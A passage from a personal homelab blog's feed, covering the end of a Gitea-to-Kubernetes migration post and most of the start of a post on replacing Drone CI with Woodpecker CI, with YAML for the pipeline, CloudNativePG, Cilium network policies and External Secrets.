</span></span><span style="display:flex;"><span>xx drop <span style="color:#f92672">(</span>Policy denied<span style="color:#f92672">)</span> flow 0x0 to endpoint 896, ifindex 5, file bpf_lxc.c:2067, , identity world-&gt;63410: 300.300.300.1:59774 -&gt; 10.8.5.79:2222 tcp SYN
</span></span></code></pre></div><p>Fast forward through an hour of reading through Cilium&rsquo;s network policy docs,
and I took another look at the policy - and realized that I had screwed up the
indentation. &#x1f926;
It should of course look like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#e6db74">&#34;cilium.io/v2&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">CiliumNetworkPolicy</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#e6db74">&#34;gitea-access&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">endpointSelector</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">matchExpressions</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">key</span>: <span style="color:#e6db74">&#34;app.kubernetes.io/name&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">operator</span>: <span style="color:#ae81ff">In</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">values</span>:
</span></span><span style="display:flex;"><span>          - <span style="color:#e6db74">&#34;gitea&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ingress</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">fromEndpoints</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">matchLabels</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">homelab/ingress</span>: <span style="color:#e6db74">&#34;true&#34;</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">io.kubernetes.pod.namespace</span>: <span style="color:#ae81ff">traefik-ingress</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">fromEntities</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">world</span>
</span></span></code></pre></div><p>With the <code>fromEntities</code> entry in the <code>ingress:</code> list, not the <code>fromEndpoints:</code>
list.
And after that it was all up and running. Woodpecker, my CI, did not need any
additional config to access Gitea, it worked out of the box. Likely because
it uses HTTPS for Git access and goes through the standard Gitea URL. And I
don&rsquo;t think I can change that to have it use the internal service instead of
going through the ingress. That&rsquo;s because it also uses Gitea for auth, and
I don&rsquo;t think it will handle having two different URLs to access Gitea very
well. But that still ended up on the rickety pile of Homelab tasks to look at
at some point.</p>
<p>Overall, it was a good migration and allowed me to figure out my DB migration
strategy with a service which I could do without for a couple of days.
I also have to congratulate the Gitea community on their work on the Helm
chart. It was definitely one of the better ones I&rsquo;ve used.</p>
<p>And that&rsquo;s it for today. I can&rsquo;t say what&rsquo;s going to be next on the migration
list, as I haven&rsquo;t decided yet. I first thought to migrate my IoT services,
Mosquitto, zigbee2mqtt and friends, but I&rsquo;d also like to tackle some of the
bigger items, like Nextcloud. On the other hand, I&rsquo;m really not looking forward
to touching my Nextcloud deployment. It has been working so nicely.</p>
]]></content:encoded>
    </item>
    <item>
      <title>Nomad to k8s, Part 15: Migrating my CI</title>
      <link>https://blog.mei-home.net/posts/k8s-migration-15-ci/</link>
      <pubDate>Sun, 26 Jan 2025 22:50:33 +0100</pubDate>
      <guid>https://blog.mei-home.net/posts/k8s-migration-15-ci/</guid>
      <description>Migrating my Drone CI install on Nomad to a Woodpecker CI on Kubernetes</description>
      <content:encoded><![CDATA[<p>Wherein I migrate my Drone CI setup on Nomad to a Woodpecker CI setup on k8s.</p>
<p>This is part 16 of my <a href="https://blog.mei-home.net/tags/k8s-migration/">k8s migration series</a>.</p>
<p>Finally, another migration blog post! I&rsquo;m still rather happy that I&rsquo;m getting
into it again.
For several years now, I&rsquo;ve been running a CI setup to automate a number of
tasks related to some personal projects. CI stands for <a href="https://en.wikipedia.org/wiki/Continuous_integration">Continuous Integration</a>,
and Wikipedia says this about it:</p>
<blockquote>
<p>Continuous integration (CI) is the practice of integrating source code changes frequently and ensuring that the integrated codebase is in a workable state.</p></blockquote>
<p>I&rsquo;m pretty intimately familiar with the concept on a rather large scale, as I&rsquo;m
working in a CI team at a large company.</p>
<p>In the Homelab, I&rsquo;m using CI for a variety of use cases, ranging from the
traditional automated test cases for software I&rsquo;ve written to just a convenient
automation for things like container image builds. I will go into details on a
few of those use cases later on, when I describe how I&rsquo;ve migrated some of my
projects.</p>
<p>The basic principle of CI for me is: You push a commit to a Git repository,
and a piece of software automatically launches a variety of test jobs. These
can range from UT jobs, over automated linter runs up to automated deploys of
the updated software.</p>
<h2 id="from-drone-ci-to-woodpecker-ci">From Drone CI to Woodpecker CI</h2>
<p>Since I started running a CI, I&rsquo;ve been using <a href="https://www.drone.io/">Drone CI</a>.
It&rsquo;s a relatively simple CI system, compared to what one could build e.g. with
<a href="https://zuul-ci.org/">Zuul</a>, <a href="https://www.jenkins.io/">Jenkins</a> and <a href="https://www.gerritcodereview.com/">Gerrit</a>.</p>
<p>Drone CI consists of two components, the Drone CI server providing web hooks for
the Git Forge to call and launching the jobs, and agents, which take the jobs
and run them. In my deployment on Nomad, I was using the <a href="https://github.com/drone-runners/drone-runner-docker">drone-runner-docker</a>.
It mounts the host&rsquo;s Docker socket into the agent and uses it to launch Docker
containers for each step of the CI pipeline.</p>
<p>It has always worked well for me and mostly got out of my way. So I didn&rsquo;t switch
to <a href="https://woodpecker-ci.org/">Woodpecker CI</a> because of features. There aren&rsquo;t
that many different features anyway, because Woodpecker is a community fork of
Drone CI.
Rather, Drone CI started to have quite a bad smell. What bothered me the most
was that their release notes were basically empty and said things like
&ldquo;integrated UI updates&rdquo;.
Then there is whatever happens after they were bought by Harness. Then there&rsquo;s
the fact that the component which needs to mount your host&rsquo;s Docker socket hasn&rsquo;t
been updated in over a year.</p>
<p>In contrast, Woodpecker is a community project and had a far nicer smell, so I
decided that while I was at it, I would not just migrate Drone to k8s but also
switch to Woodpecker.</p>
<p>One of the things I genuinely looked forward to was the backend. With the migration
to k8s, I could finally make use of my entire cluster. With Drone&rsquo;s Docker runner,
I always had to reserve a lot of resources for the CI job execution on the nodes
where the agents were launched.
Now, with the Kubernetes backend, it doesn&rsquo;t matter (much, more later) where
the agents are running - the only thing they do is launching Pods to run each
step of the pipeline, but where those are scheduled is left to Kubernetes.</p>
<p>I will go into more detail later, when talking about my CI job migrations,
but let me still give a short example of what I&rsquo;m actually talking about.</p>
<p>Here&rsquo;s a slight variation of the example pipeline from the <a href="https://woodpecker-ci.org/docs/usage/intro">Woodpecker docs</a>:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">when</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">event</span>: <span style="color:#ae81ff">push</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">branch</span>: <span style="color:#ae81ff">master</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">steps</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">build</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">image</span>: <span style="color:#ae81ff">debian</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">commands</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">echo &#34;This is the build step&#34;</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">echo &#34;binary-data-123&#34; &gt; executable</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">a-test-step</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">image</span>: <span style="color:#ae81ff">golang:1.16</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">commands</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">echo &#34;Testing ...&#34;</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">./executable</span>
</span></span></code></pre></div><p>This pipeline tells Woodpecker that it should only be run when a Git push is
done to the <code>master</code> branch of the repository. This file would be committed to
the repository it&rsquo;s used in, but there are also options to tell Woodpecker
to listen on events for other repositories. So you could theoretically even have
a separate &ldquo;CI&rdquo; repository with all the pipelines. But that&rsquo;s generally not a
good idea.</p>
<p>The pipeline itself will execute two separate steps, called &ldquo;build&rdquo; and &ldquo;a-test-step&rdquo;.
The <code>image:</code> parameter defines which container image is executed, in this case
Debian and the golang image. And then follows a list of commands to be run.
In this case, they&rsquo;re pretty nonsensical and will lead to failed pipelines,
but it&rsquo;s only here for demonstration purposes anyway. In the Woodpecker web UI,
this is what the pipeline looks like:</p>
<figure>
    <img loading="lazy" src="first_run.png"
         alt="A screenshot of the Woodpecker web UI. It is separated into two main areas. The left one shows an overview of the pipeline and its steps. At the top left, it shows that the pipeline was launched by a push from user mmeier. Below that follows the list of steps, showing in order: clone, build, a-test-step. Both clone and build have a green check mark next to them, while a-test-step has a red X. The a-test-step step is also highlighted. On the right side, a window header &#39;Step Logs&#39; shows the logs from the a-test-step execution. It starts out echoing the string &#39;Testing ...&#39;, followed by &#39;/bin/sh: 18: ./executable: Permission denied&#39;."/> <figcaption>
            <p>Screenshot of my first Woodpecker CI pipeline execution.</p>
        </figcaption>
</figure>

<h2 id="database-deployment">Database deployment</h2>
<p>To begin with, Woodpecker needs a bit of infrastructure set up, namely a
Postgres database. Smaller deployments can also be run on SQLite, I&rsquo;m using
Postgres mostly out of habit.</p>
<p>As I&rsquo;ve <a href="https://blog.mei-home.net/posts/k8s-migration-8-cloud-native-pg/">written about before</a>,
I&rsquo;m using <a href="https://cloudnative-pg.io/">CloudNativePG</a> for my Postgres DB needs.
In the recent <a href="https://cloudnative-pg.io/documentation/1.25/release_notes/v1.25/">1.25 release</a>,
CNPG introduced support for creating multiple databases in a single Cluster.
But because I&rsquo;ve already started with &ldquo;one Cluster per app&rdquo;, I decided to stay
with that approach for the duration of the k8s migration and look into merging
it all into one Cluster later.</p>
<p>Because I&rsquo;ve written about it in detail before, here&rsquo;s just the basic options
for the CNPG Cluster CRD I&rsquo;m using:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">postgresql.cnpg.io/v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Cluster</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">woodpecker-pg-cluster</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">woodpecker</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">instances</span>: <span style="color:#ae81ff">2</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">imageName</span>: <span style="color:#e6db74">&#34;ghcr.io/cloudnative-pg/postgresql:16.2-10&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">bootstrap</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">initdb</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">database</span>: <span style="color:#ae81ff">woodpecker</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">owner</span>: <span style="color:#ae81ff">woodpecker</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">requests</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">memory</span>: <span style="color:#ae81ff">200M</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">cpu</span>: <span style="color:#ae81ff">150m</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">postgresql</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">parameters</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">max_connections</span>: <span style="color:#e6db74">&#34;200&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">shared_buffers</span>: <span style="color:#e6db74">&#34;50MB&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">effective_cache_size</span>: <span style="color:#e6db74">&#34;150MB&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">maintenance_work_mem</span>: <span style="color:#e6db74">&#34;12800kB&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">checkpoint_completion_target</span>: <span style="color:#e6db74">&#34;0.9&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">wal_buffers</span>: <span style="color:#e6db74">&#34;1536kB&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">default_statistics_target</span>: <span style="color:#e6db74">&#34;100&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">random_page_cost</span>: <span style="color:#e6db74">&#34;1.1&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">effective_io_concurrency</span>: <span style="color:#e6db74">&#34;300&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">work_mem</span>: <span style="color:#e6db74">&#34;128kB&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">huge_pages</span>: <span style="color:#e6db74">&#34;off&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">max_wal_size</span>: <span style="color:#e6db74">&#34;128MB&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">wal_keep_size</span>: <span style="color:#e6db74">&#34;512MB&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">storage</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">size</span>: <span style="color:#ae81ff">1.</span><span style="color:#ae81ff">5G</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">storageClass</span>: <span style="color:#ae81ff">rbd-fast</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">backup</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">barmanObjectStore</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">endpointURL</span>: <span style="color:#ae81ff">http://rook-ceph-rgw-rgw-bulk.rook-cluster.svc:80</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">destinationPath</span>: <span style="color:#e6db74">&#34;s3://backup-cnpg/&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">s3Credentials</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">accessKeyId</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">name</span>: <span style="color:#ae81ff">rook-ceph-object-user-rgw-bulk-cnpg-backup-woodpecker</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">key</span>: <span style="color:#ae81ff">AccessKey</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">secretAccessKey</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">name</span>: <span style="color:#ae81ff">rook-ceph-object-user-rgw-bulk-cnpg-backup-woodpecker</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">key</span>: <span style="color:#ae81ff">SecretKey</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">retentionPolicy</span>: <span style="color:#e6db74">&#34;30d&#34;</span>
</span></span><span style="display:flex;"><span>---
</span></span><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">postgresql.cnpg.io/v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">ScheduledBackup</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">woodpecker-pg-backup</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">method</span>: <span style="color:#ae81ff">barmanObjectStore</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">immediate</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">schedule</span>: <span style="color:#e6db74">&#34;0 30 1 * * *&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">backupOwnerReference</span>: <span style="color:#ae81ff">self</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">cluster</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">name</span>: <span style="color:#ae81ff">woodpecker-pg-cluster</span>
</span></span></code></pre></div><p>As always, I&rsquo;m configuring backups right away.
For CNPG to work, the operator needs network access to the Postgres instance
started up in the Woodpecker namespace, so a network policy is also needed:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#e6db74">&#34;cilium.io/v2&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">CiliumNetworkPolicy</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#e6db74">&#34;woodpecker-pg-cluster-allow-operator-ingress&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">endpointSelector</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">matchLabels</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">cnpg.io/cluster</span>: <span style="color:#ae81ff">woodpecker-pg-cluster</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ingress</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">fromEndpoints</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">matchLabels</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">io.kubernetes.pod.namespace</span>: <span style="color:#ae81ff">cnpg-operator</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">app.kubernetes.io/name</span>: <span style="color:#ae81ff">cloudnative-pg</span>
</span></span></code></pre></div><p>While we&rsquo;re on the topic of network policies, here&rsquo;s my generic deny-all
policy I&rsquo;m using in most namespaces:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#e6db74">&#34;cilium.io/v2&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">CiliumNetworkPolicy</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#e6db74">&#34;woodpecker-deny-all-ingress&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">endpointSelector</span>: {}
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ingress</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">fromEndpoints</span>:
</span></span><span style="display:flex;"><span>      - {}
</span></span></code></pre></div><p>This allows all intra-namespace access between Pods, but no ingress from any
Pods in other namespaces.</p>
<p>And because Woodpecker provides a web UI, I also need to provide access to the
<code>server</code> Pod from my Traefik ingress:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#e6db74">&#34;cilium.io/v2&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">CiliumNetworkPolicy</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#e6db74">&#34;woodpecker-traefik-access&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">endpointSelector</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">matchExpressions</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">key</span>: <span style="color:#e6db74">&#34;app.kubernetes.io/name&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">operator</span>: <span style="color:#ae81ff">In</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">values</span>:
</span></span><span style="display:flex;"><span>          - <span style="color:#e6db74">&#34;server&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ingress</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">fromEndpoints</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">matchLabels</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">homelab/ingress</span>: <span style="color:#e6db74">&#34;true&#34;</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">io.kubernetes.pod.namespace</span>: <span style="color:#ae81ff">traefik-ingress</span>
</span></span></code></pre></div><p>Hm, writing all of this up I&rsquo;m realizing that I completely forgot to write a
post about some &ldquo;standard things&rdquo; I will be doing for most apps. I had planned
to do that for the migration of my Audiobookshelf instance to k8s, but
completely forgot to write any post about it at all. Will put it on the pile. &#x1f604;</p>
<p>Before getting to the Woodpecker Helm chart, we also need to do a bit of
yak shaving with regards to the CNPG DB secrets. Helpfully, CNPG always
creates a secret with the necessary credentials to access the database,
in multiple formats. An example would look like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">data</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">dbname</span>: <span style="color:#ae81ff">woodpecker</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">host</span>: <span style="color:#ae81ff">woodpecker-pg-cluster-rw</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">jdbc-uri</span>: <span style="color:#ae81ff">jdbc:postgresql://woodpecker-pg-cluster-rw.woodpecker:5432/woodpecker?password=1234&amp;user=woodpecker</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">password</span>: <span style="color:#ae81ff">1234</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">pgpass</span>: <span style="color:#ae81ff">woodpecker-pg-cluster-rw:5432:woodpecker:woodpecker:1234</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">port</span>: <span style="color:#ae81ff">5432</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">uri</span>: <span style="color:#ae81ff">postgresql://woodpecker:1234@woodpecker-pg-cluster-rw.woodpecker:5432/woodpecker</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">user</span>: <span style="color:#ae81ff">woodpecker</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">username</span>: <span style="color:#ae81ff">woodpecker</span>
</span></span></code></pre></div><p>I would love to be able to use the values from that Secret verbatim, specifically
the <code>uri</code> property, to set the <code>WOODPECKER_DATABASE_DATASOURCE</code> variable from
it. But sadly, the <a href="https://github.com/woodpecker-ci/helm">Woodpecker Helm chart</a>
is one of those which do allow Secrets to be used to set environment variables -
but only via <code>envFrom.secretRef</code>. Which feeds the Secret&rsquo;s keys in as env
variables, but doesn&rsquo;t allow to set specific env variables to specific keys
from the secret, via <code>env.valueFrom.secretKeyRef</code>.</p>
<p>I think this should be a
functionality every Helm chart provides, specifically for cases like this. I&rsquo;ve
got two tools which automatically create Secrets in my cluster, CNPG for DB
credentials and configs, and Rook, which creates Secrets and ConfigMaps for
S3 buckets and Ceph users created through its CRDs.
But every tool/Helm chart seems to have their own ideas about the env variables
certain things should be stored in. The S3 credential env vars in the case of
Rook&rsquo;s S3 buckets should work in most cases because they&rsquo;re pretty standardized,
but everything else is pretty much hit-and-miss.</p>
<p>And, with the <code>env.valueFrom</code> functionality for both Secrets and ConfigMaps,
Kubernetes already provides the necessary utility to assign specific keys from
them to specific env vars. A number of Helm charts just need to allow me to
make use of that, instead of insisting on Secrets with a specific group of keys.</p>
<p>Anyway, in the case of Secrets, I&rsquo;ve found a pretty roundabout way to achieve
what I want, namely being able to use automatically created credentials.
And I&rsquo;m using my <a href="https://external-secrets.io/latest/">External Secrets</a>
deployment for this, more specifically the ability to configure a Kubernetes
namespace as a SecretStore:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">external-secrets.io/v1beta1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">SecretStore</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">secrets-store</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">woodpecker</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">provider</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">kubernetes</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">remoteNamespace</span>: <span style="color:#ae81ff">woodpecker</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">auth</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">serviceAccount</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">name</span>: <span style="color:#ae81ff">ext-secrets-woodpecker</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">server</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">caProvider</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">type</span>: <span style="color:#ae81ff">ConfigMap</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">name</span>: <span style="color:#ae81ff">kube-root-ca.crt</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">key</span>: <span style="color:#ae81ff">ca.crt</span>
</span></span><span style="display:flex;"><span>---
</span></span><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">ServiceAccount</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">ext-secrets-woodpecker</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">woodpecker</span>
</span></span><span style="display:flex;"><span>---
</span></span><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">rbac.authorization.k8s.io/v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Role</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">ext-secrets-woodpecker-role</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">woodpecker</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">rules</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">apiGroups</span>: [<span style="color:#e6db74">&#34;&#34;</span>]
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">secrets</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">verbs</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">get</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">list</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">watch</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">apiGroups</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">authorization.k8s.io</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">selfsubjectrulesreviews</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">verbs</span>:
